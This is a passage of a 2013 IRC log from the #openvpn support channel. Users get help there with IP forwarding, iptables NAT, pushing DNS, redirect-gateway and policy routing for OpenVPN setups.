a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 23:07 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 23:07 < hrenovo> !nat 23:07 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 23:08 < hrenovo> EugeneKay: do you think i'm all good with !ipforward now ? 23:08 <@EugeneKay> hrenovo - dunno; I'd have to look at your system, and that costs $150/hr. :-p 23:08 < hrenovo> ) 23:08 <@EugeneKay> If you've got the sysctl entry sorted then yes 23:09 < stan_man_can> is the sysctl on server or client? 23:09 < hrenovo> server 23:09 < stan_man_can> !sysctl 23:09 <@EugeneKay> sysctl is a linux thing; the setting in question is performed on the servr. 23:10 < hrenovo> should I restart the server to make sure sysctl kicks in ? 23:10 < hrenovo> restart the host I mean 23:10 <@EugeneKay> No; the /proc/sys is fine 23:10 < hrenovo> ok 23:10 <@EugeneKay> If you typo'ed it won't work on boot, so if you wanna make sure then go for it. I tend not to assume incompetence tho 23:10 < hrenovo> I understand 23:10 < stan_man_can> whats the link to the sysctl stuff again 23:11 < hrenovo> I am still not sure if I got #3 working 23:11 <@EugeneKay> !linipforwward 23:11 <@EugeneKay> !linipforward 23:11 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 23:11 <@EugeneKay> hrenovo - if you can ping a public IP(through the VPN) then it did. 23:11 <@EugeneKay> The networking is probably the trickiest bit of it, after the PKI setup. 23:11 <@EugeneKay> Annnnd it's breakfast time 23:11 <@EugeneKay> Toodles, and goodl uck 23:12 < stan_man_can> Oh god the DNS pushing looks like a huge headache 23:12 < hrenovo> I added iptables -I FORWARD -i tun+ -j ACCEPT and showed you the paste oof iptables -L -l nat http://fpaste.org/Tmh9/ 23:12 < hrenovo> looks good ? 23:13 < hrenovo> its pinging !!!! 23:13 < hrenovo> yaaaaaay 23:19 < hrenovo> crap 23:19 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Read error: Operation timed out] 23:20 < hrenovo> no i can't 23:20 < hrenovo> I thought I was able to ping 8.8.8.8 but I wasn't connected to vpn ( 23:20 < hrenovo> as soon as I connect I can't ping it 23:22 < hrenovo> i'm stuck 23:22 < hrenovo> I am tempted to restart the host 23:22 < hrenovo> but this will kick me off the irc 23:23 < hrenovo> !nat 23:23 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 23:24 < hrenovo> !linnat 23:24 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 23:27 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has left #openvpn [] 23:28 < hrenovo> EugeneKay: http://fpaste.org/bZ88/ 23:28 < hrenovo> I made this change 23:28 < hrenovo> but still can't ping 8.8.8.8 23:29 < hrenovo> MASQUERADE all -- 10.8.0.0/24 anywhere 23:30 < hrenovo> or should it be MASQUERADE all -- 10.8.0.1/24 anywhere 23:30 < hrenovo> ? 23:39 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Quit: I quit] --- Day changed Fri Mar 15 2013 00:02 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Read error: Operation timed out] 00:10 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 00:22 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 00:24 -!- Visitorerer [~Visitorer@64.111.86.226] has joined #openvpn 00:25 < Visitorerer> My friend and I are connected through Tunnelblick, but we can't ping eachother. Config/logs here : http://pastebin.com/7rvRbivz 00:30 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 00:31 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 264 seconds] 00:39 -!- p3rror [~mezgani@41.140.31.21] has joined #openvpn 00:40 -!- p3rror [~mezgani@41.140.31.21] has quit [Read error: Connection reset by peer] 00:49 -!- p3rror [~mezgani@41.140.31.21] has joined #openvpn 01:05 < jzaw> morning all 01:05 < jzaw> can i ip rule add from / table 01:06 < jzaw> or do i really have to go into /etc/iproute2/rt_tables and edit that 01:06 < jzaw> before i can test things? 01:07 < jzaw> this http://wiki.openwrt.org/doc/networking/routing 01:07 < jzaw> suggests single hosts 01:07 < jzaw> id want to do whole nets .... is that ok? 01:08 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 01:22 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 01:24 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 01:42 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 01:49 < pekster> jzaw: Yup, all the 'ip' commands take CIDR masks to define networks unless it's for something strictly requiring a host, like PtP peering 01:51 < pekster> And no need to name a table unless you want to. You can use arbitrary numbers for tables 01:55 < jzaw> thats cool pekster 01:55 < jzaw> can you tell me if this is sane ? 01:56 < pekster> What using numbers? Sure 01:56 < jzaw> remove route ... 81.2.122.192/26 via 10.0.0.1 dev tap0 01:56 < jzaw> ip rule add from 81.2.122.192/26 table 10 01:57 < jzaw> ip route add 81.2.122.192/26 via 10.0.0.1 dev tap0 table 10 01:57 < jzaw> ip route flush 01:57 < jzaw> flush cache i mean 01:57 < pekster> You generally still want the route on the default table, otherwise the kernel can't reach the VPN network range itself unless you send it to table 10 01:57 < jzaw> so not delete 81.2.122.192/26 via 10.0.0.1 dev tap0 01:58 < pekster> It's valid to set a table up like that, but it's not much use unless you plan to do something specific with the table 01:58 < jzaw> well i just want those icmp's to come back down the right route :D 01:59 < jzaw> hehe 01:59 < jzaw> also ... im thinking its causing problems with my voip 01:59 < pekster> Oh, you're trying to route that range across the VPN? Why not just push a route then... 01:59 < jzaw> in a similar fashion ... since the rtp can be p2p and thus come down the vpn but go out the nat 02:01 < jzaw> i do ... push "route 81.2.122.192 255.255.255.192" 02:01 < jzaw> from server.conf ^^ 02:01 < pekster> Right, then clients route that range across the VPN when the tunnel is up 02:01 < jzaw> yes 02:02 < pekster> It's just a route entry. Unless you need to route different types of traffic differently, you shouldn't be messing with multiple routing tables 02:02 < jzaw> so other than sending all traffic down the vpn 02:02 < jzaw> is there a cure for that asymmetrical routing the icmp seem to take 02:02 < jzaw> i thought source routing might help 02:03 < pekster> Ah, okay. You should define your goal upfront (it saves a lot of time.) 02:03 * jzaw nods :) 02:03 < pekster> Is the system receiving the ping your VPN client? 02:04 < jzaw> no fuji-pl.dzki.co.uk is behind the router ... which is the client 02:04 < jzaw> its this laptop 02:04 < jzaw> the net connection here is nat via that same router 02:04 < pekster> So, it looks like this: [some Internet host] -> (Internet) -> (router VPN client) -> [router's LAN] -> [laptop on LAN] ? 02:05 < pekster> Well, plus your VPN server and link between the web and router VPN client, yes? 02:05 < jzaw> if i understand that topo yes 02:06 < pekster> In order to keep arbitrary reply traffic arriving over the tap device going back out that way when you don't know the source in advance (like my public IP pinging you) you need to mark the connection and route based on that 02:06 < pekster> The VPN client is a linux box, yes? 02:07 < jzaw> yes openwrt on a tp-link wr740n 02:07 < jzaw> so iptables marking ? 02:07 < pekster> Okay, so you need to do a few things. 1) create a secondary routing table (table 10 or w/e is fine.) Add the tap network route like you had before, *plus* a default route going to the VPN server 02:08 < pekster> Then you need to use the connmark module (see the iptables-extensions(8) manpage for details) and mark the connection of anything arriving via the tap device 02:09 < pekster> Finally, you need to copy the connmark to the per-packet mark in the mangle table on mangle/PREROUTING so you can use the fwmark as your routing decision in the 'ip' command 02:09 * jzaw nods 02:09 < jzaw> just one q though 02:09 < jzaw> you say default route to vpn server 02:09 < pekster> Add an 'ip rule' to filter on the fwmark, and send it to table 10 02:09 < jzaw> but i only want lan traffic to go down the vpn not all 02:10 < pekster> Are you trying to put all the LAN's traffic going anyway down the VPN, or just reply traffic to what's sent to a LAN client over the VPN? 02:10 < pekster> Do you want a LAN PC's request for, say, youtube to go across the VPN? 02:11 < jzaw> nope ... but if a request for say something from xyz.dzki.co.uk that should go down the vpn 02:11 < pekster> routing doesn't deal with domain names, only IPs 02:11 < jzaw> if its come up the vpn i also want it to go back down 02:11 < pekster> Right 02:11 < jzaw> sure i was just using dzk.co.uk to define that group of ips 02:12 < pekster> The return routing needs the connmark, connmark -> fwmark, plus policy routing to do 02:12 < jzaw> its a pub subnet (different to the nat lan here) 02:12 < pekster> As for the routing of that subnet, just put it on the default table and you might as well let openvpn manage that addition when it comes up 02:13 * jzaw nods 02:13 < pekster> It's really just the reply to connections sent to your clients that's the tricky part 02:13 < jzaw> yes ... as they are pub ips ... they will be coming up the vpn from the server end 02:13 < jzaw> they need to go back there 02:13 < pekster> I'm not sure why you're using tap for your VPN though. routing should be plenty sufficent since you're routing anyway 02:14 < pekster> tun is for routing, tap is for bridging 02:14 * jzaw nods ... simple change 02:14 < pekster> As long as you don't intend to be bridging, yes 02:14 < jzaw> ah it was cos i only had the /29 and tap seemed to use fewer ips for the vpn 02:14 < pekster> !/30 02:14 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 02:15 < jzaw> tun seems to use 4 02:15 < pekster> That explains why. Use topology subnet 02:15 < jzaw> k cool 02:16 -!- ade_b [~Ade@koln-5d815ef7.pool.mediaWays.net] has joined #openvpn 02:16 -!- ade_b [~Ade@koln-5d815ef7.pool.mediaWays.net] has quit [Changing host] 02:16 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:16 < jzaw> but im now just using 10.x.x.x for the vpn so no limit 02:17 < pekster> It's generally pointless to assign more than a /24 to openvpn since you end up being limited in terms of the CPU/single-threaded model long before you can use ~253 clients 02:18 < jzaw> aye 02:19 < jzaw> btw i mean i use 10.x.x.x for the tap ..which will be tun soon 02:19 < jzaw> server end has pub ips ... and so does the client end 02:20 < jzaw> but client end ips are routed to my gw ip at the server end thus need to go down the vpn to reach them 02:21 < pekster> Yup, I've set up VPNs like that before 02:23 < pekster> In my case the policy routing was easier, since the client end had 2 VLANs, and one was sent strictly out the local ISP, and the other only had internal corp LANs routed across the VPN, with the default gateway set to the local ISP as well 02:23 < pekster> But, the only real complication for your setup is that packet/connection marking business 02:24 < jzaw> i see 02:25 < pekster> That did mean external (non-corp) things couldn't ever reach the LAN clients by external IP, but that was firewalled anyway, so it didn't matter 02:25 < pekster> You want that to work :) 02:27 < jzaw> aye :) 02:27 -!- corretico [~luis@190.211.93.38] has quit [Read error: Connection reset by peer] 02:30 -!- corretico [~luis@190.211.93.38] has joined #openvpn 02:39 -!- corretico [~luis@190.211.93.38] has quit [Remote host closed the connection] 02:42 -!- corretico [~luis@190.211.93.38] has joined #openvpn 04:03 -!- Morg0th [~Morg0th@82-212-146-28.teledisnet.be] has joined #openvpn 04:13 -!- zz_AsadH is now known as AsadH 04:15 -!- brute11k [~brute@89.249.230.137] has joined #openvpn 04:21 -!- iliketrains [~TF7@p578b0d2b.dip0.t-ipconnect.de] has joined #openvpn 04:25 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 252 seconds] 04:30 < Morg0th> hello, i'm trying to connect to a VPN on Linux, in the output of "openvpn /etc/openvpn/openvpn.conf" it looks like it's working but i still can't access the VPN network. i see the ppp0 interface, is there anything else i should do after running openvpn? 04:31 -!- iliketrains [~TF7@p578b0d2b.dip0.t-ipconnect.de] has quit [Ping timeout: 264 seconds] 04:37 < Morg0th> i put my openvpn.conf here: http://codepad.org/JcQS78lQ 04:37 <@vpnHelper> Title: Plain Text code - 16 lines - codepad (at codepad.org) 04:43 -!- iliketrains [~TF7@pd95b7877.dip0.t-ipconnect.de] has joined #openvpn 04:45 < iliketrains> good morning! could someone help me with a little problem? (openvpn srv won't start) 04:54 -!- iliketrains [~TF7@pd95b7877.dip0.t-ipconnect.de] has quit [] 04:55 < jzaw> does openvpn run on obsd 04:55 < jzaw> ooh seems like it might :) 05:12 < kisom> What MIME-type should be used on iOS/Android to have a configuration file open in the app? 05:14 < kisom> application/x-openvpn-profile did the trick 05:40 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 05:42 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 05:43 -!- master_of_master [~master_of@p4FF24517.dip.t-dialin.net] has quit [Ping timeout: 246 seconds] 05:45 -!- master_of_master [~master_of@p4FF24395.dip.t-dialin.net] has joined #openvpn 05:47 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 05:50 -!- master_o1_master [~master_of@p4FF24417.dip.t-dialin.net] has joined #openvpn 05:53 -!- master_of_master [~master_of@p4FF24395.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 06:02 -!- marksaitis [~marksaiti@88.96.60.78] has joined #openvpn 06:20 -!- master_of_master [~master_of@p4FF24CC9.dip.t-dialin.net] has joined #openvpn 06:23 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 06:24 -!- master_o1_master [~master_of@p4FF24417.dip.t-dialin.net] has quit [Ping timeout: 258 seconds] 06:25 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 06:29 -!- hatschi [~marvin@dslb-188-098-215-065.pools.arcor-ip.net] has joined #openvpn 06:37 -!- marksaitis [~marksaiti@88.96.60.78] has quit [Ping timeout: 258 seconds] 07:02 < Wulf> Morg0th: ppp0? 07:07 -!- marksaitis [~marksaiti@88.96.60.78] has joined #openvpn 07:22 -!- DougEFresh [me@208.99.80.128] has quit [Read error: No route to host] 07:35 -!- p3rror [~mezgani@41.140.31.21] has quit [Ping timeout: 258 seconds] 07:38 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 07:42 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 07:50 -!- p3rror [~mezgani@41.248.146.127] has joined #openvpn 07:50 -!- cpm [~Chip@216.169.175.102] has joined #openvpn 07:50 -!- cpm [~Chip@216.169.175.102] has quit [Changing host] 07:50 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn 07:54 -!- p3rror [~mezgani@41.248.146.127] has quit [Ping timeout: 240 seconds] 08:04 -!- marksaitis [~marksaiti@88.96.60.78] has quit [Ping timeout: 258 seconds] 08:05 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 245 seconds] 08:05 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 272 seconds] 08:08 -!- p3rror [~mezgani@41.249.26.140] has joined #openvpn 08:10 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 08:12 -!- p3rror [~mezgani@41.249.26.140] has quit [Read error: Connection reset by peer] 08:17 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 08:18 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 08:56 -!- cpm [~Chip@pdpc/supporter/active/cpm] has quit [Quit: cpm] 09:01 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Read error: Connection reset by peer] 09:02 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 09:16 < Morg0th> Wulf: sorry i meant the tap0 interface. ppp0 was from when i tried with pptp which didn't work either 09:19 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 09:23 -!- bkrieg1337 [~bkrieg133@120.28.171.16] has joined #openvpn 09:25 < bkrieg1337> hello 09:25 <@ecrist> hello 09:25 < bkrieg1337> i need help setting up openvpn 09:25 < bkrieg1337> im stuck at client setup 09:26 < bkrieg1337> help please 09:26 < bkrieg1337> this is the guide i followed https://help.ubuntu.com/12.04/serverguide/openvpn.html 09:26 <@vpnHelper> Title: OpenVPN (at help.ubuntu.com) 09:28 <@ecrist> !howto 09:28 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 09:29 < bkrieg1337> reading. thank for resource 09:30 < bkrieg1337> thank you* 09:42 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 09:47 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 09:48 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 09:53 -!- p3rror [~mezgani@41.143.216.65] has joined #openvpn 09:58 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 09:58 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 09:59 -!- p3rror [~mezgani@41.143.216.65] has quit [Ping timeout: 260 seconds] 10:04 -!- p3rror [~mezgani@41.249.18.228] has joined #openvpn 10:07 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 10:10 -!- p3rror [~mezgani@41.249.18.228] has quit [Ping timeout: 260 seconds] 10:13 -!- dekroning [~dekroning@vps3.cttinnovations.net] has joined #openvpn 10:13 < dekroning> hi 10:13 -!- p3rror [~mezgani@41.248.207.114] has joined #openvpn 10:13 < dekroning> i'm using openvpnas and i'm having troubles with 2 linux boxes that are connected 10:13 < rob0> !as 10:13 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 10:13 < dekroning> thanks 10:13 < rob0> yw 10:15 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds] 10:16 -!- p3rror [~mezgani@41.248.207.114] has quit [Read error: Operation timed out] 10:21 -!- raidz_away is now known as raidz 10:29 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 10:31 -!- rickbol [~rickbol@cpe-174-096-184-106.carolina.res.rr.com] has quit [Ping timeout: 264 seconds] 10:32 -!- p3rror [~mezgani@41.250.234.137] has joined #openvpn 10:37 -!- p3rror [~mezgani@41.250.234.137] has quit [Ping timeout: 264 seconds] 10:42 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 264 seconds] 10:47 -!- rickbol [~rickbol@173-132-151-91.pools.spcsdns.net] has joined #openvpn 10:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 11:10 -!- rickbol [~rickbol@173-132-151-91.pools.spcsdns.net] has quit [Read error: Connection reset by peer] 11:11 -!- p3rror [~mezgani@41.249.155.51] has joined #openvpn 11:11 -!- rickbol [~rickbol@173-132-151-91.pools.spcsdns.net] has joined #openvpn 11:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 11:16 -!- rickbol [~rickbol@173-132-151-91.pools.spcsdns.net] has quit [Read error: Connection reset by peer] 11:16 -!- rickbol [~rickbol@173-132-151-91.pools.spcsdns.net] has joined #openvpn 11:24 -!- Morg0th [~Morg0th@82-212-146-28.teledisnet.be] has quit [Quit: leaving] 11:29 -!- rickbol [~rickbol@173-132-151-91.pools.spcsdns.net] has quit [Ping timeout: 256 seconds] 11:34 -!- Devastator [~devas@unaffiliated/devastator] has quit [] 11:43 -!- dekroning [~dekroning@vps3.cttinnovations.net] has quit [Ping timeout: 260 seconds] 11:44 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 264 seconds] 11:44 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 11:46 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has quit [] 11:48 -!- mezgani [~mezgani@adsl196-54-17-217-196.adsl196-9.iam.net.ma] has joined #openvpn 11:49 -!- hrenovo [hrenovo@2600:3c03::f03c:91ff:fe70:d8f6] has joined #openvpn 11:50 < hrenovo> !dns 11:50 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns 11:50 < hrenovo> !pushdns 11:50 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 11:50 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 11:51 -!- p3rror [~mezgani@41.249.155.51] has quit [Ping timeout: 276 seconds] 11:53 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:53 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 11:56 -!- Ancient [~ancient@108.59.1.200] has quit [Ping timeout: 245 seconds] 11:57 < hrenovo> hi guys 11:57 < hrenovo> so trying to push all trafic to the client vpn tunnel 11:57 < hrenovo> I am following the redirect_diagram.png 11:58 < hrenovo> I am at a point where I can ping 8.8.8.8 11:58 < hrenovo> but not google.com 11:58 < hrenovo> I just added push "dhcp-option DNS 10.8.0.1" in server.conf 11:58 < hrenovo> but no luck so far 11:59 -!- Ancient [~ancient@us.whatbox.ca] has joined #openvpn 12:00 < hrenovo> any services besides openvpn server that I forgot to restart ? 12:00 -!- con3x_ [~pkinnaird@kobol.geeksoc.org] has quit [Quit: leaving] 12:02 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 12:04 -!- Valcorb|| [~Valcorb@64.20.55.138] has joined #openvpn 12:05 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 245 seconds] 12:06 -!- AsadH is now known as zz_AsadH 12:12 < hrenovo> nvm got it 12:12 < hrenovo> its all working fine now 12:13 < bkrieg1337> hello 12:13 < bkrieg1337> :) 12:13 < hrenovo> ) 12:13 < hrenovo> http://www.speedtest.net/result/2576159745.png 12:13 < hrenovo> with openvpn 12:14 < bkrieg1337> nice 12:15 -!- hatschi [~marvin@dslb-188-098-215-065.pools.arcor-ip.net] has quit [Read error: Operation timed out] 12:17 -!- hatschi [~marvin@dslb-188-098-215-065.pools.arcor-ip.net] has joined #openvpn 12:17 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 12:20 -!- Valcorb|| [~Valcorb@64.20.55.138] has quit [Ping timeout: 245 seconds] 12:27 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:28 -!- hatschi [~marvin@dslb-188-098-215-065.pools.arcor-ip.net] has quit [Ping timeout: 252 seconds] 12:28 -!- hatschi_ [~marvin@dslb-188-098-215-065.pools.arcor-ip.net] has joined #openvpn 12:30 < hrenovo> !def1 12:30 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 12:32 < hrenovo> !redirect 12:32 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 12:32 <@vpnHelper> http://ircpimps.org/redirect.png 12:32 < hrenovo> !linforward 12:32 < hrenovo> !linforward 12:32 < hrenovo> !ipforward 12:32 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 12:33 < hrenovo> !linipforward 12:33 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 12:36 -!- p3rror [~mezgani@41.249.89.34] has joined #openvpn 12:37 -!- mezgani [~mezgani@adsl196-54-17-217-196.adsl196-9.iam.net.ma] has quit [Ping timeout: 245 seconds] 12:49 -!- dekroning [~dekroning@vps3.cttinnovations.net] has joined #openvpn 12:53 -!- dekroning [~dekroning@vps3.cttinnovations.net] has quit [Ping timeout: 248 seconds] 13:32 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 13:35 -!- mezgani [~mezgani@41.249.139.176] has joined #openvpn 13:38 -!- p3rror [~mezgani@41.249.89.34] has quit [Ping timeout: 276 seconds] 13:40 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 13:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:53 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 13:53 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 13:55 -!- dekroning [~dekroning@vps3.cttinnovations.net] has joined #openvpn 13:58 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 14:01 -!- mezgani [~mezgani@41.249.139.176] has quit [Read error: Operation timed out] 14:02 -!- p3rror [~mezgani@41.249.31.8] has joined #openvpn 14:08 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 14:09 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:43 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:46 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 245 seconds] 14:49 -!- hrenovo [hrenovo@2600:3c03::f03c:91ff:fe70:d8f6] has quit [Quit: I quit] 15:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:09 -!- hatschi_ [~marvin@dslb-188-098-215-065.pools.arcor-ip.net] has quit [Quit: hatschi_] 15:12 < jzaw> at the mo i'm having to manually add a route for the client network 15:13 < jzaw> can i get that to automate at the server using the cdd files? 15:13 -!- brute11k [~brute@89.249.230.137] has quit [Quit: Leaving.] 15:13 < kisom> jzaw: No. Use a client connect script. 15:14 < jzaw> does the file in the ccd dir take the same name as the cn on the cert/key o the client 15:14 < kisom> Also: 15:14 < kisom> !goal 15:14 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 15:15 < jzaw> kisom ... ive a routed home lan ..... the client end is nat ... but the lan ips are pub ips 15:15 < jzaw> they are routed to the homelan gw and must go down the vpn to reach the actual hosts 15:15 < jzaw> im using 10.x.x.x as the tun ips 15:15 < jzaw> ive routes set up but every time the server is restarted 15:16 < jzaw> i have to manually add the route to the client ips 15:16 <@ecrist> are you dropping privs? or are you not running as admin? 15:16 < jzaw> not dropping privs at this time 15:16 <@ecrist> !logs 15:16 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 15:17 < jzaw> pasting 15:17 -!- bkrieg1337 [~bkrieg133@120.28.171.16] has quit [Quit: Leaving] 15:21 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 15:21 -!- MeanderingCode_ 